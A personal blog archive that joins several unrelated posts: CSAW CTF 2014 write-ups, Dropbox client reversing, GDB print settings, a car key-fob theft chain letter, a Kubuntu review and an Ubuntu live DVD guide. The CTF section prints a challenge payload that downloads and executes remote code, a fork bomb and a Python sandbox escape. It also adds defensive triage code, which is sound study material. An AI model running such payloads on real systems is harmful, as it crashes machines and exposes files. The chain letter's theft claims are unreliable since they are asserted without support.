CSAW CTF Quals 2014


Reversing 100

A zip archive, eggshell-master.zip, was given.
I tried to run some of the Python files included in it, but it crashed my machine.
Then I found a file named utils.pyc and decompiled it using uncompyle2.

/usr/local/bin/uncompyle2 utils.pyc                                                                                                            
# 2014.09.22 12:44:53 IST
#Embedded file name: /Users/kchung/Desktop/CSAW Quals 2014/rev100/utils.py
exec __import__('urllib2').urlopen('http://kchung.co/lol.py').read()
+++ okay decompyling utils.pyc 
# decompiled 1 files: 1 okay, 0 failed, 0 verify failed
# 2014.09.22 12:44:53 IST

I opened the http://kchung.co/lol.py link, which displayed the following code:

import os
while True:
    try:
        os.fork()
    except:
        os.system('start')
# flag{trust_is_risky}
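
One way to look inside a .pyc from an untrusted archive without running it, as an added example that is not part of the original write-up (Python 3; the watch list, function names and sample one-liner are constructed for illustration). It only loads bytecode built by the same interpreter version, so a Python 2 file like the challenge's still needs a decompiler such as uncompyle2.

```python
import importlib.util
import marshal
import types

# Names worth a human look before a .pyc from an untrusted archive is run.
# The list is an assumption for this example, not a complete policy.
WATCHED_NAMES = {"exec", "eval", "compile", "__import__", "urlopen",
                 "system", "popen", "fork", "socket", "subprocess"}


def load_code(pyc_bytes):
    """Return the code object stored in a .pyc without executing it.

    marshal is not hardened against malformed input, so do this in a
    throwaway VM or container when the file is hostile.
    """
    # CPython 3.7+ header: 4-byte magic, 4-byte flags, 8 bytes mtime+size or hash.
    if pyc_bytes[:4] != importlib.util.MAGIC_NUMBER:
        raise ValueError("pyc was built by a different Python version")
    code = marshal.loads(pyc_bytes[16:])
    if not isinstance(code, types.CodeType):
        raise ValueError("payload is not a code object")
    return code


def walk(code):
    """Yield the module code object and every nested function/class body."""
    yield code
    for const in code.co_consts:
        if isinstance(const, types.CodeType):
            yield from walk(const)


def triage(pyc_bytes):
    """Collect watched names and URL-like string constants from the bytecode."""
    names, urls = set(), set()
    for code in walk(load_code(pyc_bytes)):
        names.update(n for n in code.co_names if n in WATCHED_NAMES)
        urls.update(c for c in code.co_consts
                    if isinstance(c, str) and "://" in c)
    return {"names": sorted(names), "urls": sorted(urls)}


def build_pyc(source, filename):
    """Compile source to .pyc bytes in memory (constructed sample input)."""
    header = importlib.util.MAGIC_NUMBER + b"\x00" * 12
    return header + marshal.dumps(compile(source, filename, "exec"))


# Constructed one-liner with the same shape as the decompiled utils.py,
# ported to Python 3 and pointed at a reserved, non-resolving host.
# It is only compiled here, never executed.
SAMPLE_SOURCE = ("exec(__import__('urllib.request').request"
                 ".urlopen('http://example.invalid/payload.py').read())\n")

if __name__ == "__main__":
    report = triage(build_pyc(SAMPLE_SOURCE, "utils.py"))
    print("watched names:", report["names"])
    print("URL constants:", report["urls"])
```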

Reversing 200

A Windows PE32 executable was given. It was more or less a similar challenge to last year’s quals.

I ran the program and found that it prints an encrypted flag. I immediately loaded it in IDA with the debugger and found that the program exits upon detecting a debugger, and a decryption function is called just before that. Kindly follow what is mentioned in this image to get the decrypted flag:
[Image: Reversing 200]

flag{reversing_is_not_that_hard!}

Networking 100

A pcap file was given.
The hint given was misleading, but I knew that the flag would be transferred through a TCP connection as plain text, judging by the points given for this challenge. I created a dump of the TCP connections as tcp.pcap. I used a tool called tcpflow, which breaks down each TCP connection and stores its content in an ASCII file.

tcpflow -r tcp.pcap

These are the files created after running the above command.

058.179.133.087.62973-192.168.221.128.01301 192.168.221.128.01300-061.054.024.060.20302 192.168.221.128.01315-173.014.243.236.00080
074.095.093.093.16881-192.168.221.128.01302 192.168.221.128.01301-058.179.133.087.62973 192.168.221.128.01317-162.017.162.237.06881
173.014.243.233.16881-192.168.221.128.01277 192.168.221.128.01302-074.095.093.093.16881 192.168.221.128.01318-197.083.255.148.43786
192.168.221.128.01277-173.014.243.233.16881 192.168.221.128.01306-192.168.221.136.00023 192.168.221.128.01320-061.054.024.053.20202
192.168.221.128.01292-192.168.221.136.00022 192.168.221.128.01307-096.252.203.249.60974 192.168.221.128.01322-106.120.035.039.22827
192.168.221.128.01293-173.014.243.236.00080 192.168.221.128.01308-061.054.024.062.20402 192.168.221.136.00022-192.168.221.128.01292
192.168.221.128.01295-101.226.180.138.20902 192.168.221.128.01309-061.054.024.072.20402 192.168.221.136.00023-192.168.221.128.01306
192.168.221.128.01296-180.153.091.176.20802 192.168.221.128.01311-036.229.180.205.06881 197.083.255.148.43786-192.168.221.128.01318
192.168.221.128.01297-061.054.024.070.20202 192.168.221.128.01312-087.218.248.070.20388 alerts.txt
192.168.221.128.01298-071.245.166.078.51413 192.168.221.128.01313-064.087.001.236.16881 report.xml
192.168.221.128.01299-099.235.219.011.06881 192.168.221.128.01314-122.141.235.138.20802 tcp.pcap

Then I ran `strings` to check for any flag in plain text, and fortunately I found the flag in plain text.

strings * | grep "flag"

flag{bigdataisaproblemnotasolution}

Exploitation 100

An ELF 32-bit binary file was given.
I ran the strings command on it and the flag was hard-coded in it.

flag{exploitation_is_easy!}

Exploitation 200

A python file was given.

In this problem, all the functions except print and raw_input are removed from the Python shell that is given to us.

This is similar to the Python jail break challenge in PlaidCTF 2013.
After a few Google searches I came to know that in Python, a type object has a __bases__ attribute, which returns the list of all its base classes. It also has a __subclasses__ method that returns the list of all types that inherit from it. If we use __bases__ on a random type, we can reach the top of the type hierarchy (the object type), then read the subclasses of object to get a list of all types defined in the interpreter:

().__class__.__bases__[0].__subclasses__()

Index 40 points to the file function:

In [10]: ().__class__.__bases__[0].__subclasses__()[40]
Out[10]: file

And the exploit is here:

().__class__.__bases__[0].__subclasses__()[40]('./key').read()
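
Why stripping builtins is not a sandbox, as an added Python 3 example that is not part of the original write-up: the same type-hierarchy walk still enumerates every loaded class, while an AST allow-list refuses the expression before it is evaluated. The names guarded_eval, Rejected and MAX_LENGTH are hypothetical, chosen for this example.

```python
import ast


def eval_without_builtins(expr):
    """Evaluate expr the way the challenge shell does: no builtins in scope."""
    return eval(expr, {"__builtins__": {}}, {})


def reachable_type_names():
    """Names of the classes still reachable from an empty tuple in the jail."""
    classes = eval_without_builtins("().__class__.__bases__[0].__subclasses__()")
    return {cls.__name__ for cls in classes}


class Rejected(ValueError):
    """Raised when an expression uses syntax outside the allow-list."""


# Allow-list: numeric literals and basic arithmetic only. Attribute access,
# calls, subscripts, names and ** (cheap CPU exhaustion) are all absent,
# so the type-hierarchy walk cannot even be expressed.
ALLOWED_NODES = (ast.Expression, ast.Constant, ast.BinOp, ast.UnaryOp,
                 ast.Add, ast.Sub, ast.Mult, ast.Div, ast.Mod,
                 ast.UAdd, ast.USub)
MAX_LENGTH = 200  # hypothetical input limit for this example


def guarded_eval(expr):
    """Evaluate expr only if every AST node is on the allow-list."""
    if len(expr) > MAX_LENGTH:
        raise Rejected("expression too long")
    try:
        tree = ast.parse(expr, mode="eval")
    except SyntaxError as exc:
        raise Rejected("not a valid expression") from exc
    for node in ast.walk(tree):
        if not isinstance(node, ALLOWED_NODES):
            raise Rejected("%s is not allowed" % type(node).__name__)
        if isinstance(node, ast.Constant) and type(node.value) not in (int, float):
            raise Rejected("only numeric literals are allowed")
    try:
        return eval(compile(tree, "<calc>", "eval"), {"__builtins__": {}}, {})
    except ArithmeticError as exc:
        raise Rejected("arithmetic error") from exc


def is_rejected(expr):
    """True when guarded_eval refuses the expression."""
    try:
        guarded_eval(expr)
    except Rejected:
        return True
    return False


if __name__ == "__main__":
    print("classes reachable with no builtins:", len(reachable_type_names()))
    print("1 + 2 * 3 =", guarded_eval("1 + 2 * 3"))
    print("hierarchy walk rejected:",
          is_rejected("().__class__.__bases__[0].__subclasses__()"))
```

An allow-list like this only fits calculator-style input; code that must run arbitrary Python belongs in a separate, unprivileged process or container.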

Solutions for more challenges will be added very soon.

Reversing Dropbox client application for fun


Dropbox is a cloud-based file storage service used by millions of users. The security of Dropbox has not been analyzed properly. Recently, I came across a paper titled Looking inside (Drop)box, which was presented at USENIX. The paper explains how to reverse engineer the Dropbox client application and extract the algorithm. Dropbox clients are mostly written in Python. The author of the paper, Dhiru Kholia, has uploaded the essential scripts required to reverse engineer Dropbox.

Let's start hacking

Unpacking and decrypting encrypted Dropbox bytecode

The first thing to do is to get Dropbox:

wget -O - "https://www.dropbox.com/download?plat=lnx.x86" | tar xzf -

Clone Dhiru’s dedrop repository:

➜ (Dropbox) git clone https://github.com/kholia/dedrop

The paper mentions running Dropbox with a custom LD_PRELOAD. The shared object required for the custom LD_PRELOAD can be built using:

➜ cd dedrop/src/dedrop
➜  dedrop (master) ls
all.py  main.c  Makefile  map  _marshal.py  opcode-generator.py  payload.o  payload.py
➜  dedrop (master) make                                                                                                                
objcopy -I binary -O elf32-i386 -B i386 payload.py payload.o
gcc -Wall -ggdb -fPIC -Wno-unused-but-set-variable -m32 -c -I/usr/include/python2.7 -o main.o main.c
gcc -Wall -ggdb -fPIC -Wno-unused-but-set-variable -m32 -shared -Wl,-soname -Wl,libdedrop.so -o libdedrop.so main.o payload.o -lpthread -ldl
➜  dedrop (master)  ls                                                                                                                  
all.py  libdedrop.so  main.c  main.o  Makefile  map  _marshal.py  opcode-generator.py  payload.o  payload.py

Now the shared object is ready for use:

➜ dedrop (master) export BLOB_PATH=$HOME/.dropbox-dist/dropbox
➜ dedrop (master) LD_PRELOAD=$HOME/Dropbox/dedrop/src/dedrop/libdedrop.so ~/.dropbox-dist/dropbox

You may get an output like this:

.
.
[+] writing to /home/seshagiri/Dropbox/dedrop/src/dedrop/pyc_decrypted/xml/sax/xmlreader.pyc
[+] writing to /home/seshagiri/Dropbox/dedrop/src/dedrop/pyc_decrypted/zipfile.pyc

:) :) :) w00t!

All the decrypted bytecode has been written in .pyc file format into the pyc_decrypted directory.

Decompile the decrypted files

I have written a small shell script to decompile all the pyc files in pyc_decrypted directory using uncompyle2 tool.

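#!/bin/bash
# Decompile every .pyc under the current directory next to the original file.
find . -name '*.pyc' | while read -r i
do
        filename=${i%.pyc}
        echo "Uncompiling $i"
        # head -n-3 drops the trailing status lines that uncompyle2 prints
        uncompyle2 "$i" | head -n-3 > "$filename.py"
done

# Remove the bytecode files once the sources have been written
find . -name "*.pyc" -exec rm {} \;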

We now have all the decompiled programs in the pyc_decrypted directory. Using these files, you can start building your own open source Dropbox client if you want.

The authors have also mentioned breaking the two-factor authentication used in Dropbox and hijacking Dropbox accounts. As I am a beginner in RE, I haven’t looked into it further. I will be updating this article later to include the session hijacking and the breaking of two-factor authentication of Dropbox accounts.

GDB Print Settings


GDB provides the following ways to control how arrays, structures, and symbols are printed.

These settings are useful for debugging programs in any language:

set print address
set print address on
GDB prints memory addresses showing the location of stack traces, structure values, pointer values, breakpoints, and so forth, even when it also displays the contents of those addresses. The default is on. For example, this is what a stack frame display looks like with set print address on:

(gdb) f
#0 set_quotes (lq=0x34c78 "<>")
at input.c:530
530 if (lquote != def_lquote)

set print address off
Do not print addresses when displaying their contents. For example, this is the same stack frame displayed with set print address off:

(gdb) set print addr off
(gdb) f
#0 set_quotes (lq="<>") at input.c:530
530 if (lquote != def_lquote)

You can use 'set print address off' to eliminate all machine-dependent displays from the GDB interface. For example, with print address off, you should get the same text for backtraces on all machines, whether or not they involve pointer arguments.

show print address
Show whether or not addresses are to be printed.

When GDB prints a symbolic address, it normally prints the closest earlier symbol plus an offset. If that symbol does not uniquely identify the address (for example, it is a name whose scope is a single source file), you may need to clarify. One way to do this is with info line, for example 'info line *0x4537'. Alternately, you can set GDB to print the source file and line number when it prints a symbolic address:

set print symbol-filename on
Tell GDB to print the source file name and line number of a symbol in the symbolic form of an address.
set print symbol-filename off
Do not print source file name and line number of a symbol. This is the default.
show print symbol-filename
Show whether or not GDB will print the source file name and line number of a symbol in the symbolic form of an address.

Another situation where it is helpful to show symbol filenames and line numbers is when disassembling code; GDB shows you the line number and source file that corresponds to each instruction.

Also, you may wish to see the symbolic form only if the address being printed is reasonably close to the closest earlier symbol:

set print max-symbolic-offset max-offset
Tell GDB to only display the symbolic form of an address if the offset between the closest earlier symbol and the address is less than max-offset. The default is 0, which tells GDB to always print the symbolic form of an address if any symbol precedes it.
show print max-symbolic-offset
Ask how large the maximum offset is that GDB prints in a symbolic address.

If you have a pointer and you are not sure where it points, try 'set print symbol-filename on'. Then you can determine the name and source file location of the variable where it points, using 'p/a pointer'. This interprets the address in symbolic form. For example, here GDB shows that a variable ptt points at another variable t, defined in 'hi2.c':

(gdb) set print symbol-filename on
(gdb) p/a ptt
$4 = 0xe008 <t in hi2.c>

Warning: For pointers that point to a local variable, 'p/a' does not show the symbol name and filename of the referent, even with the appropriate set print options turned on.

Other settings control how different kinds of objects are printed:

set print array
set print array on
Pretty print arrays. This format is more convenient to read, but uses more space. The default is off.
set print array off
Return to compressed format for arrays.
show print array
Show whether compressed or pretty format is selected for displaying arrays.
set print elements number-of-elements
Set a limit on how many elements of an array GDB will print. If GDB is printing a large array, it stops printing after it has printed the number of elements set by the set print elements command. This limit also applies to the display of strings. Setting number-of-elements to zero means that the printing is unlimited.
show print elements
Display the number of elements of a large array that GDB will print. If the number is 0, then the printing is unlimited.
set print null-stop
Cause GDB to stop printing the characters of an array when the first NULL is encountered. This is useful when large arrays actually contain only short strings.
set print pretty on
Cause GDB to print structures in an indented format with one member per line, like this:
$1 = {
  next = 0x0,
  flags = {
    sweet = 1,
    sour = 1
  },
  meat = 0x54 "Pork"
}

set print pretty off
Cause GDB to print structures in a compact format, like this:
$1 = {next = 0x0, flags = {sweet = 1, sour = 1}, \
meat = 0x54 "Pork"}

This is the default format.
show print pretty
Show which format GDB is using to print structures.
set print sevenbit-strings on
Print using only seven-bit characters; if this option is set, GDB displays any eight-bit characters (in strings or character values) using the notation \nnn. This setting is best if you are working in English (ASCII) and you use the high-order bit of characters as a marker or “meta” bit.
set print sevenbit-strings off
Print full eight-bit characters. This allows the use of more international character sets, and is the default.
show print sevenbit-strings
Show whether or not GDB is printing only seven-bit characters.
set print union on
Tell GDB to print unions which are contained in structures. This is the default setting.
set print union off
Tell GDB not to print unions which are contained in structures.
show print union
Ask GDB whether or not it will print unions which are contained in structures.

For example, given the declarations

typedef enum {Tree, Bug} Species;
typedef enum {Big_tree, Acorn, Seedling} Tree_forms;
typedef enum {Caterpillar, Cocoon, Butterfly}
              Bug_forms;

struct thing {
  Species it;
  union {
    Tree_forms tree;
    Bug_forms bug;
  } form;
};

struct thing foo = {Tree, {Acorn}};

with set print union on in effect 'p foo' would print

$1 = {it = Tree, form = {tree = Acorn, bug = Cocoon}}

and with set print union off in effect it would print

$1 = {it = Tree, form = {...}}

These settings are of interest when debugging C++ programs:

set print demangle
set print demangle on
Print C++ names in their source form rather than in the encoded (“mangled”) form passed to the assembler and linker for type-safe linkage. The default is 'on'.
show print demangle
Show whether C++ names are printed in mangled or demangled form.
set print asm-demangle
set print asm-demangle on
Print C++ names in their source form rather than their mangled form, even in assembler code printouts such as instruction disassemblies. The default is off.
show print asm-demangle
Show whether C++ names in assembly listings are printed in mangled or demangled form.
set demangle-style style
Choose among several encoding schemes used by different compilers to represent C++ names. The choices for style are currently:
auto
Allow GDB to choose a decoding style by inspecting your program.
gnu
Decode based on the GNU C++ compiler (g++) encoding algorithm. This is the default.
lucid
Decode based on the Lucid C++ compiler (lcc) encoding algorithm.
arm
Decode using the algorithm in the C++ Annotated Reference Manual. Warning: this setting alone is not sufficient to allow debugging cfront-generated executables. GDB would require further enhancement to permit that.
foo
Show the list of formats.
show demangle-style
Display the encoding style currently in use for decoding C++ symbols.
set print object
set print object on
When displaying a pointer to an object, identify the actual (derived) type of the object rather than the declared type, using the virtual function table.
set print object off
Display only the declared type of objects, without reference to the virtual function table. This is the default setting.
show print object
Show whether actual, or declared, object types are displayed.
set print static-members
set print static-members on
Print static members when displaying a C++ object. The default is on.
set print static-members off
Do not print static members when displaying a C++ object.
show print static-members
Show whether C++ static members are printed, or not.
set print vtbl
set print vtbl on
Pretty print C++ virtual function tables. The default is off.
set print vtbl off
Do not pretty print C++ virtual function tables.
show print vtbl
Show whether C++ virtual function tables are pretty printed, or not.

How to Lock Your Car and Why?


I locked my car. As I walked away I heard my car door unlock. I went back and locked my car again three times. Each time, as soon as I started to walk away, I would hear it unlock again!! Naturally alarmed, I looked around and there were two guys sitting in a car in the fire lane next to the store. They were obviously watching me intently, and there was no doubt they were somehow involved in this very weird situation. I quickly chucked the errand I was on, jumped in my car and sped away. I went straight to the police station, told them what had happened, and found out I was part of a new, and very successful, scheme being used to gain entry into cars. Two weeks later, my friend’s son had a similar happening….

While traveling, my friend’s son stopped at a roadside rest to use the bathroom. When he came out to his car less than 4-5 minutes later, someone had gotten into his car and stolen his cell phone, laptop computer, GPS navigator, briefcase……you name it. He called the police and since there were no signs of his car being broken into, the police told him he had been a victim of the latest robbery tactic — there is a device that robbers are using now to clone your security code when you lock your doors on your car using your key-chain locking device..

They sit a distance away and watch for their next victim. They know you are going inside of the store, restaurant, or bathroom and that they now have a few minutes to steal and run. The police officer said to manually lock your car door by hitting the lock button inside the car; that way, if there is someone sitting in a parking lot watching for their next victim, it will not be you.

When you hit the lock button on your car upon exiting, it does not send the security code, but if you walk away and use the door lock on your key chain, it sends the code through the airwaves where it can be instantly stolen. This is very real.

Be wisely aware of what you just read and please pass this note on. Look how many times we all lock our doors with our remote just to be sure we remembered to lock them — and bingo, someone has our code…and whatever was in our car.

Please share with everyone you know!!

Note: The receiving device is known as a “Spectrum Analyzer” and the signal can be recorded and played back to unlock the car door. True!

Migrated to Kubuntu


Kubuntu 11.04 was released last month, and I have been using it since. I found it very interesting because of its wide variety of applications. The default window manager, KWIN, is capable of producing visual effects without installing extra packages. Ubuntu cannot withhold some of the features of Kubuntu. Kubuntu is more user friendly than Ubuntu. The problem with Kubuntu: sometimes it crashes! Just after installation, it crashed. Ubuntu never crashed on my system! KWIN (the default window manager in Kubuntu) has so many bugs, and it's time for the newbies to prove themselves by fixing some bugs! The desktop cube effect is pretty good when compared to the Compiz desktop cube of Ubuntu. Widgets are one of the attractive features of KDE. I am using the folder view, Facebook, and analog clock widgets. The mobile view of Facebook is available through the Facebook widget. The default video player is Dragon Player; well, I don’t like it at all. I am a hardcore fan of VLC. The default audio player is my favorite: Amarok. It might be one of the reasons to migrate to Kubuntu. Amarok works pretty well in Kubuntu (it never worked in Ubuntu).
Ratings
Look and performance: 8/10.
Stability: 7/10.

How to make a Customized Ubuntu live DVD


How-To: Customize your Ubuntu Live CD

Live CDs are great: they let you try out a distribution without installing it. They allow you to run your favorite distribution on any computer and, on top of this, they come in handy to recover a system.

The Ubuntu live CD is already packed with some pretty nifty software that allows you to do pretty much everything with the Live CD, but still, there might be some software included with it that you don’t need, or some software you need might be missing.

Another Pro for this is that by customizing your image, you will be able to install

This tutorial will show the steps to follow in order to customize an Ubuntu Live CD to your needs by removing some components and adding others.

During this tutorial, we are going to remaster our Ubuntu Gutsy Gibbon 7.10 Live CD with the following spec:

  • Remove non-English language packs
  • Update the software releases shipped on the live CD
  • Enable universe and multiverse repository
  • Include divx, mp3 support, realplayer ….
  • Include ndiswrapper support
  • Add Firefox flash-nonfree plugin, add skype.
  • Add some network troubleshooting tools: traceroute, wireshark, kismet…

The resulting image will be bigger than 800M, so it won’t fit on a CD, but will be fine on a DVD.

1. Preparing the host

First of all, we need to get the current karmic Live CD image and store it, let's say, on ~/Desktop. We will also need to install an extra piece of software to rebuild our karmic live CD’s squashfs:

$ sudo apt-get install squashfs-tools chroot

Now let’s get started by setting up our working environment. First, we are going to mount the iso under /tmp/livecd:

$ mkdir /tmp/livecd
$ sudo mount -o loop ~/Desktop/ubuntu-9.10-desktop-i386.iso /tmp/livecd

Then create a directory containing our future CD image (cd) in our working directory (~/livecd) and copy all the CD content but casper/filesystem.squashfs in our ~/livecd/cd directory:

$ mkdir ~/livecd
$ mkdir ~/livecd/cd
$ rsync --exclude=/casper/filesystem.squashfs -a /tmp/livecd/ ~/livecd/cd

This copies everything but the squashfs file, which is the compressed file containing our live CD filesystem.

Now we need to mount casper/filesystem.squashfs onto a directory called ~/livecd/squashfs in order to copy its content in a directory where we are going to edit our live CD filesystem: ~/livecd/custom

$ mkdir ~/livecd/squashfs
$ mkdir ~/livecd/custom
$ sudo modprobe squashfs
$ sudo mount -t squashfs -o loop /tmp/livecd/casper/filesystem.squashfs ~/livecd/squashfs/
$ sudo cp -a ~/livecd/squashfs/* ~/livecd/custom

And finally, let's copy /etc/resolv.conf and /etc/hosts to our ~/livecd/custom/etc so we will be able to access the network from within the image we are going to customize (through chroot):

$ sudo cp /etc/resolv.conf /etc/hosts ~/livecd/custom/etc/

2. Getting into our future image:

In order to customize the image, we will chroot into the ~/livecd/custom directory and mount the necessary pseudo-filesystems (/proc and /sys). From there, we will be able to customize our Live CD.

$ sudo chroot ~/livecd/custom
# mount -t proc none /proc/
# mount -t sysfs none /sys/
# export HOME=/root

Now we are ready, let’s customize….

3. Customizing our future live CD

3.1. Removing packages

First of all, we are going to remove the non-English language packs and, in order to free some more space, the gnome-games packages.

# apt-get remove --purge gnome-games*
# apt-get remove --purge `dpkg-query -W --showformat='${Package}\n' | grep language-pack | egrep -v '\-en'`

Mind that you might want to remove some other software. In order to see the installed software, you can run the following:

# dpkg-query -W --showformat='${Package}\n' | less

3.2. Updating the existing image

Now that we have removed the software we do not need, we can update our /etc/apt/sources.list in order to enable the universe and multiverse repositories along with gutsy-updates, gutsy-security and the partner repository so we can install vmware-server.

Open and edit /etc/apt/sources.list

# vim /etc/apt/sources.list

and make it look like:

deb http://archive.ubuntu.com/ubuntu karmic main restricted universe multiverse
deb-src http://archive.ubuntu.com/ubuntu karmic main restricted universe multiverse

deb http://archive.ubuntu.com/ubuntu karmic-updates main restricted universe multiverse
deb-src http://archive.ubuntu.com/ubuntu karmic-updates main restricted universe multiverse

deb http://security.ubuntu.com/ubuntu karmic-security main restricted universe multiverse
deb-src http://security.ubuntu.com/ubuntu karmic-security main restricted universe multiverse

deb http://archive.canonical.com/ubuntu karmic partner
deb-src http://archive.canonical.com/ubuntu karmic partner

deb http://ppa.launchpad.net/openoffice-pkgs/ubuntu karmic main
deb-src http://ppa.launchpad.net/openoffice-pkgs/ubuntu karmic main

deb http://ppa.launchpad.net/compiz/ubuntu karmic main
deb-src http://ppa.launchpad.net/compiz/ubuntu karmic main

deb http://ppa.launchpad.net/netbook-remix-team/ubuntu karmic main
deb-src http://ppa.launchpad.net/netbook-remix-team/ubuntu karmic main

deb http://ppa.launchpad.net/lidaobing/ppa/ubuntu karmic main
deb-src http://ppa.launchpad.net/lidaobing/ppa/ubuntu karmic main

deb http://ppa.launchpad.net/asac/ppa/ubuntu karmic main
deb-src http://ppa.launchpad.net/asac/ppa/ubuntu karmic main

deb http://ppa.launchpad.net/globalmenu-team/ubuntu karmic main
deb-src http://ppa.launchpad.net/globalmenu-team/ubuntu karmic main

deb http://ppa.launchpad.net/themuso/ubuntu karmic main
deb-src http://ppa.launchpad.net/themuso/ubuntu karmic main

deb http://ppa.launchpad.net/zulcss/ubuntu karmic main
deb-src http://ppa.launchpad.net/zulcss/ubuntu karmic main

deb http://ppa.launchpad.net/q-funk/ubuntu karmic main
deb-src http://ppa.launchpad.net/q-funk/ubuntu karmic main

deb http://ppa.launchpad.net/ted-gould/ubuntu karmic main
deb-src http://ppa.launchpad.net/ted-gould/ubuntu karmic main

deb http://ppa.launchpad.net/hyperair/ubuntu karmic main
deb-src http://ppa.launchpad.net/hyperair/ubuntu karmic main

deb http://ppa.launchpad.net/bigon/ubuntu karmic main
deb-src http://ppa.launchpad.net/bigon/ubuntu karmic main

deb http://ppa.launchpad.net/gnomefreak/ubuntu karmic main
deb-src http://ppa.launchpad.net/gnomefreak/ubuntu karmic main

deb http://ppa.launchpad.net/marceloshima/ubuntu karmic main
deb-src http://ppa.launchpad.net/marceloshima/ubuntu karmic main

deb http://ppa.launchpad.net/freenx-team/ubuntu karmic main
deb-src http://ppa.launchpad.net/freenx-team/ubuntu karmic main

deb http://ppa.launchpad.net/bhavi/ubuntu karmic main
deb-src http://ppa.launchpad.net/bhavi/ubuntu karmic main

deb http://ppa.launchpad.net/scott/ubuntu karmic main
deb-src http://ppa.launchpad.net/scott/ubuntu karmic main

deb http://ppa.launchpad.net/intuitivenipple/ubuntu karmic main
deb-src http://ppa.launchpad.net/intuitivenipple/ubuntu karmic main

deb http://ppa.launchpad.net/suraia/ubuntu karmic main
deb-src http://ppa.launchpad.net/suraia/ubuntu karmic main

deb http://ppa.launchpad.net/gwibber-daily/ppa/ubuntu karmic main
deb-src http://ppa.launchpad.net/gwibber-daily/ppa/ubuntu karmic main

Now we can update the image by running:

# apt-get update
# apt-get dist-upgrade

3.3. Installing new packages

Let's install all the multimedia packages that we might need. As per http://www.debuntu.org/how-to-play-dvd-under-ubuntu-linux, we need to install:

# apt-get install gstreamer0.10-ffmpeg gstreamer0.10-plugins-ugly gstreamer0.10-plugins-ugly-multiverse gstreamer0.10-plugins-bad gstreamer0.10-plugins-bad-multiverse vlc mplayer mplayer-fonts
# /usr/share/doc/libdvdread3/install-css.sh

Then, let's install RealPlayer:

# wget http://www.debian-multimedia.org/pool/main/r/realplay/realplayer_10.0.9-0.1_i386.deb -O /tmp/realplay.deb
# dpkg -i /tmp/realplay.deb

Now, let’s install some utils that are not included by default on the Ubuntu live CD but come in handy most of the time:

# apt-get install rar unrar unace-nonfree

Plus, let’s install some wireless network utils so we might be able to get wireless functioning with the live CD:

# apt-get install ndiswrapper-common ndiswrapper-utils-1.9 cabextract unshield \
bcm43xx-fwcutter \
kismet aircrack-ng

Let’s add some other network utility tools:

# apt-get install wireshark nmap ettercap traceroute

Also, we are going to add some firefox plugins:

# apt-get install flashplugin-nonfree mozilla-plugin-vlc

On top of this, I want to be able to use skype and vmware-server:

# apt-get install libqt4-core libqt4-gui
# wget http://skype.com/go/getskype-linux-ubuntu -O /tmp/skype.deb
# dpkg -i /tmp/skype.deb
# apt-get install vmware-server

Well, that’s about it, we now have whatever software that we (I) will need when using our live CD.
It is now about time to do some clean up.

4. Cleaning up the chroot

When we install packages, apt caches them. We need to remove the cached packages in order to save some space:

# apt-get clean

Also, there are some files in /tmp that need to be removed:

# rm -rf /tmp/*

Before chrooting, we added 2 files, /etc/hosts and /etc/resolv.conf. Let's remove them:

# rm -f /etc/hosts /etc/resolv.conf

Finally, we are ready to exit the chroot and repack the CD. We need first to umount /proc and /sys:

# umount /proc/
# umount /sys/
# exit

Finally, we are back on our host. As we have modified some packages, we need to rebuild some manifest files, recreate the squashfs and recreate the ISO.

5. Recreating the ISO

First, let's recreate the manifest files:

$ chmod +w ~/livecd/cd/casper/filesystem.manifest
$ sudo chroot ~/livecd/custom dpkg-query -W --showformat='${Package} ${Version}\n' > ~/livecd/cd/casper/filesystem.manifest
$ sudo cp ~/livecd/cd/casper/filesystem.manifest ~/livecd/cd/casper/filesystem.manifest-desktop

And regenerate the squashfs file:

$ sudo mksquashfs ~/livecd/custom ~/livecd/cd/casper/filesystem.squashfs
Parallel mksquashfs: Using 2 processors
Creating little endian 3.0 filesystem on ~/livecd/cd/casper/filesystem.squashfs, block size 65536.
….
….

Now, optionally, you might want to customize the file ~/livecd/cd/README.diskdefines, and finally update ~/livecd/cd/md5sum.txt, which contains the md5 sums of the files in ~/livecd/cd:

$ sudo rm ~/livecd/cd/md5sum.txt
$ sudo -s
# (cd ~/livecd/cd && find . -type f ! -name md5sum.txt -print0 | xargs -0 md5sum > md5sum.txt)

We are now almost done. The last thing left is to create the ISO with the following command:

$ cd ~/livecd/cd
$ sudo mkisofs -r -V "Ubuntu-Live-Custom" -b isolinux/isolinux.bin -c isolinux/boot.cat -cache-inodes -J -l -no-emul-boot -boot-load-size 4 -boot-info-table -o ~/Desktop/Ubuntu-Live-7.10-custom.iso .

Here you go, you can now test your image by either booting your computer with it or by using virtualization/emulation software such as qemu, kvm, vmware…

6. Conclusion

With a bit of work, one can customize an Ubuntu Live CD in order to remove or include software, make sure the live CD is up to date and, on top of this, allow administrators to deploy pre-customized Ubuntu distros.

The common mistake I found was in

sudo mkisofs -r -V "Ubuntu-Live-Custom" -b isolinux/isolinux.bin -c isolinux/boot.cat -cache-inodes -J -l -no-emul-boot -boot-load-size 4 -boot-info-table -o ~/Desktop/Ubuntu-Live-7.10-custom.iso . <===

the . <== represents the current directory

it will show a genisoimage error

add a space and . at the end